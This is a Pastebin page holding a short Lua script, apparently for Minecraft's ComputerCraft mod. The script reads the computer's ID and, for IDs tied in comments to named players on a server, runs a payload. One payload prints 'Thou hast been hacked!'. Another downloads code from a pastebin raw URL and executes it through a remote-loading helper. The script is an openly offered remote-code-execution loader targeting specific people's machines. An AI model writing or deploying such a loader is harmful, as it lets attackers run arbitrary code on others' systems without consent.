Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local id = os.getComputerID()
- local function runURL(url, ...)
- local program = http.get(url)
- if not program then return false end
- program = program.readAll()
- local func = loadstring(program)
- setfenv(func, getfenv())
- return func(...)
- end
- local idPayloads = {
- ['id437'] = function(...) --madskrillex01, on ShinexusUK
- print("Thou hast been hacked!")
- end,
- ['id539'] = function(...) --bishop on ShinexusUK
- runURL("http://pastebin.com/raw/x9ajKSc0")
- end,
- }
- if idPayloads["id"..id] then
- idPayloads["id"..id](...)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement